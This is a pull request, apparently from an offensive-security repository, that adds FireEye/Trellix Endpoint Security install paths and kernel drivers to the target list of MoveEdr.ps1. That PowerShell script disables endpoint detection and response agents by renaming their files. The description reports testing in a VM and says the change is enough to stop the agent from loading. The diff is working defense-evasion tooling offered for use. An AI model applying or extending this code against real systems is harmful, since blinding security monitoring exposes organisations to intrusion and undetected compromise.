### PR TITLE
Update to add Fireeye/Trellex Agent. 

### DIFF
--- a/MoveEdr.ps1
+++ b/MoveEdr.ps1
@@ -75,7 +75,14 @@ function MoveEdr{
 			"C:\Program Files\Elastic",
 			"C:\Windows\System32\drivers\elastic-endpoint-driver.sys",
 			"C:\Windows\System32\drivers\ElasticElam.sys"
-		)
+
+			#Fireeye/XAGT/xAgent/Trellix Endpoint Security
+			"C:\Program Files (x86)\FireEye\xagt",
+			"C:\Windows\System32\drivers\FeKern.sys",
+			"C:\Windows\System32\drivers\FeElam.sys",
+			"C:\ProgramData\FireEye\xagt\exts\MalwareProtection\sandbox\fe_avk.sys",
+			"C:\Windows\FireEye"
+			)
 		
 		# Windows Defender Trickery
 		if ($DefenderHard){

--- a/MoveEdr.ps1
+++ b/MoveEdr.ps1
@@ -74,7 +74,7 @@ function MoveEdr{
 			# Elastic EDR
 			"C:\Program Files\Elastic",
 			"C:\Windows\System32\drivers\elastic-endpoint-driver.sys",
-			"C:\Windows\System32\drivers\ElasticElam.sys"
+			"C:\Windows\System32\drivers\ElasticElam.sys",
 
 			#Fireeye/XAGT/xAgent/Trellix Endpoint Security
 			"C:\Program Files (x86)\FireEye\xagt",


### PR DESCRIPTION
Tested in a VM. All files are renamed except C:\Windows\System32\drivers\FeKern.sys, however the agent fails to load so this should be enough to disable the EDR. 